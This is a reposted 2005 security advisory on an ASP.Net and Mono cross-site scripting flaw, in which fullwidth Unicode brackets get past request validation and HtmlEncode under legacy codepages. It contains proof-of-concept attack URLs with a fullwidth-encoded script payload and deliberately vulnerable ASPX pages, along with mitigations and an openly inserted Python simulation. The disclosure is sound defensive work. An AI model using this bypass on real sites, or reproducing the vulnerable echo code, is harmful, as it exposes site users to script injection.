[Repost] XSS vulnerability in ASP.Net

Source: Superhei's Blog

Andrey Rusyaev, post-graduate student, Security Chair, FESU (Far Eastern State \
University), Vladivostok, Russia, andir[SPAM-PROTECT]@it-project.ru.

February 9, 2005, updated February 14, 2005

Abstract

Under specific conditions a cross-site scripting (XSS) attack [1] is possible against a web site running on ASP.Net, because special HTML characters are filtered incorrectly. The attack exploits the mechanism that converts Unicode strings [2] to national ASCII codepages. The basic problem is the lack of filtering of special HTML characters in the range U+ff00-U+ff60 (fullwidth ASCII characters [3]).

Introduction

The problem was discovered in August 2004. All versions of the .Net Framework that exist at present are affected:

   * .Net Framework, version 1.0
   * .Net Framework, version 1.0 + service pack 1
   * .Net Framework, version 1.0 + service pack 2
   * .Net Framework, version 1.1
   * .Net Framework, version 1.1 + service pack 1
   * .Net Framework, version 1.1 + service pack 1 + Security Bulletin MS05-004 of February 8, 2005

After some testing, a similar problem was discovered in the free implementation of the .Net Framework by the Mono Project [4]. The following versions are affected:

   * Mono, version 1.0.5.

Note: other versions have not been tested.

Background

The .Net Framework manipulates strings as Unicode only. Conversion from/to national ASCII codepages is possible on input/output respectively. In particular, HTML text may be output on a Web page in a national ASCII codepage (such as 'windows-1251', 'koi-8', and others) using ASP.Net. Under these conditions Unicode characters from the range U+ff00-U+ff60 (fullwidth ASCII characters) are converted to their normal ASCII counterparts. Among the fullwidth ASCII characters are some special HTML characters (such as '<', '>', and others), which may be used to inject malicious HTML code or malicious script code (with the <script> HTML tag) or other variants (more details in [5]).

Vulnerability Details

It has been discovered that ASP.Net does not filter special HTML characters (such as '>', '<' and others) in Unicode strings when the output web page is written in one of the national ASCII codepages.

  1. Injection of special HTML characters into an ASP.Net web page using Unicode characters from the fullwidth ASCII range.

    Example:

    http://server.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

    Web page 'attack1.aspx' prints the HTTP request parameter 'test'.
    The page looks like the following:

    <!-- Web page attack1.aspx -->
    <%@ Page Language="cs" %>
    <%
      // Attack through URL parameter: the value is echoed without any encoding
      Response.Write(Request.QueryString["test"]);
    %>

    Web.config for server.com looks like the following:

    <configuration>
     <system.web>
      <globalization responseEncoding="windows-1251" />
     </system.web>
    </configuration>      

  2. ASP.NET Request Validation bypass.

    The "Request Validation" mechanism, designed to protect against cross-site scripting and SQL injection, lets the restricted tags through when they are written with characters from the fullwidth ASCII range U+ff00-U+ff60.

    Example:
    http://server.com/attack2.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

    Web page 'attack2.aspx' prints the HTTP request parameter 'test'.
    The page looks like the following:

    <!-- Web page attack2.aspx -->
    <%@ Page Language="cs" ValidateRequest="true" %>
    <%
      // Attack through URL parameter: request validation does not see a fullwidth '<' as a tag
      Response.Write(Request.QueryString["test"]);
    %>

    Web.config for server.com looks like the following:

    <configuration>
     <system.web>
      <globalization responseEncoding="windows-1251" />
     </system.web>
    </configuration>      

    Note: the ValidateRequest attribute of an ASP.Net Web page is available only in ASP.Net version 1.1 and later, or in Mono (no information about versions) [6].

  3. HTML encoding methods bypass

    Note: this attack does not apply to the Mono implementation of ASP.Net.

    HttpServerUtility.HtmlEncode does not filter Unicode characters in the range U+ff00-U+ff60.

    The methods for encoding special HTML characters do not protect against the attacks in the previous examples. The encoding step runs before the conversion to the national ASCII codepage for output, so an attacker may use fullwidth ASCII characters to inject malicious code into the Web page.

    Example:
    http://server.com/attack3.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

    Web page 'attack3.aspx' prints:
      1. the HTTP request parameter 'test',
      2. a string with injected Unicode characters.

    The page looks like the following:

    <!-- Web page attack3.aspx -->
    <%@ Page Language="cs" %>
    <%
      // 1) Attack through URL parameter: HtmlEncode runs before the codepage conversion,
      //    so a fullwidth '<' (U+FF1C) is left alone and becomes '<' in windows-1251 output
      Response.Write(Server.HtmlEncode(Request.QueryString["test"]));

      // 2) Attack through injected Unicode characters in a server-side string
      string code = Server.HtmlEncode("\uff1cscript\uff1ealert('vulnerability')\uff1c/script\uff1e");
      Response.Write(code);
    %>

    Web.config for server.com looks like the following:

    <configuration>
     <system.web>
      <globalization responseEncoding="windows-1251" />
     </system.web>
    </configuration>

Protection Methods

Several protection methods may be proposed:

   * Use only a Unicode codepage for output on ASP.Net pages; for this purpose add the following to web.config:

   <configuration>
    <system.web>
      <globalization responseEncoding="utf-8" />
    </system.web>
   </configuration>
                 

   * If you cannot use Unicode, you must filter fullwidth ASCII characters out of all untrusted data (user input, HTTP headers, the output of some components and other data) before it is written to the page.
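The conversion chain behind the three attack pages above and the two protections listed here, as an added Python example written for this edit (it is not part of the advisory and is not .NET code). Server.HtmlEncode, ASP.NET 1.1 request validation and the windows-1251 best-fit conversion are modelled by small Python functions rather than called; the %uXXXX decoder reproduces the non-standard URL form used in the attack URLs; the function names (render_vulnerable, render_filtered and so on) are this example's own. The NFKC folding variant at the end is an addition beyond the advisory's two recommendations.

```python
import re
import unicodedata
import urllib.parse

# Query value from the advisory's attack URLs (constructed copy): fullwidth '<' (U+FF1C)
# and '>' (U+FF1E) in the non-standard %uXXXX form that ASP.NET's UrlDecode accepts.
PAYLOAD_QUERY = "%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e"

# U+FF01..U+FF5E are the fullwidth forms of ASCII 0x21..0x7E; the offset between them is 0xFEE0.
FULLWIDTH_ASCII = range(0xFF01, 0xFF5F)
FULLWIDTH_OFFSET = 0xFEE0


def aspnet_urldecode(query_value: str) -> str:
    """Decode a query-string value the way ASP.NET does, including the %uXXXX
    extension that standard percent-decoding does not know about."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), query_value)
    return urllib.parse.unquote(text)


def request_validation_rejects(text: str) -> bool:
    """Simplified model (an assumption, not the real implementation) of ASP.NET 1.1
    request validation: it flags an ASCII '<' followed by a tag-like character.
    A fullwidth '<' is a different code point, so the payload passes."""
    return re.search(r"<[A-Za-z!/?]", text) is not None


def html_encode(text: str) -> str:
    """Models Server.HtmlEncode of that era: only the ASCII specials are escaped."""
    return (text.replace("&", "&amp;").replace("<", "&lt;")
                .replace(">", "&gt;").replace('"', "&quot;"))


def best_fit_cp1251(text: str) -> bytes:
    """Simulation of the best-fit conversion the advisory describes (in ASP.Net the
    .NET encoder does this): a fullwidth ASCII character is written as its ASCII
    counterpart when the response encoding is windows-1251."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if cp in FULLWIDTH_ASCII:
            cp -= FULLWIDTH_OFFSET
        try:
            out += chr(cp).encode("cp1251")
        except UnicodeEncodeError:
            out += b"?"
    return bytes(out)


def render_vulnerable(value: str) -> bytes:
    """attack3.aspx: HtmlEncode runs on the Unicode string, then the page is converted
    to windows-1251, so the fullwidth brackets turn into a real <script> tag."""
    return best_fit_cp1251(html_encode(value))


def render_utf8(value: str) -> bytes:
    """Protection 1 from the advisory: responseEncoding="utf-8". No best-fit mapping
    happens, so U+FF1C stays a harmless fullwidth bracket in the output."""
    return html_encode(value).encode("utf-8")


def render_filtered(value: str) -> bytes:
    """Protection 2 from the advisory: strip fullwidth ASCII from untrusted data
    before it reaches HtmlEncode and the legacy codepage."""
    cleaned = "".join(ch for ch in value if ord(ch) not in FULLWIDTH_ASCII)
    return best_fit_cp1251(html_encode(cleaned))


def render_folded(value: str) -> bytes:
    """Alternative added here (not in the advisory): fold compatibility characters
    with NFKC first, so U+FF1C becomes '<' before HtmlEncode sees it and is
    escaped like any other bracket."""
    return best_fit_cp1251(html_encode(unicodedata.normalize("NFKC", value)))


if __name__ == "__main__":
    decoded = aspnet_urldecode(PAYLOAD_QUERY)
    print("request validation rejects it:", request_validation_rejects(decoded))
    print("vulnerable :", render_vulnerable(decoded))
    print("utf-8      :", render_utf8(decoded))
    print("filtered   :", render_filtered(decoded))
    print("NFKC folded:", render_folded(decoded))
```

Running it shows the order of operations is the whole problem: the same html_encode call is harmless in render_folded and useless in render_vulnerable, because in the latter the fullwidth bracket is only turned into '<' after the encoder has already looked at the string. Of the two mitigations on the page, switching the response to UTF-8 is the cheaper one, since it removes the best-fit step entirely instead of requiring every input path to be filtered.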

More Information

This vulnerability was reported to the Microsoft Security Response Center on August 2, 2004, and the answer received was that case 5438 had been opened for a description of the vulnerability. Later, I received the following answer:

"We have decided that a KB article and update to tools and/or best practice \
guidelines should be done for this, and will be as time permits. We are not tracking \
this case as a security bulletin".

The vulnerability has no patch at the current moment (February 9, 2005).

References

  1. CERT Advisory CA-2000-02, "Malicious HTML Tags Embedded in Client Web Requests", http://www.cert.org/advisories/CA-2000-02.html
  2. Unicode Home Page, http://unicode.org/
  3. Unicode.org, "Halfwidth and Fullwidth Forms", http://www.unicode.org/charts/PDF/UFF00.pdf
  4. Mono Project, http://mono-project.com/
  5. CGISecurity.com, "The Cross Site Scripting FAQ", May 2002, http://www.cgisecurity.com/articles/xss-faq.shtml
  6. .Net Framework SDK, @Page directive, ValidateRequest attribute, http://msdn.microsoft.com/librar ... genref/html/cpconPage.asp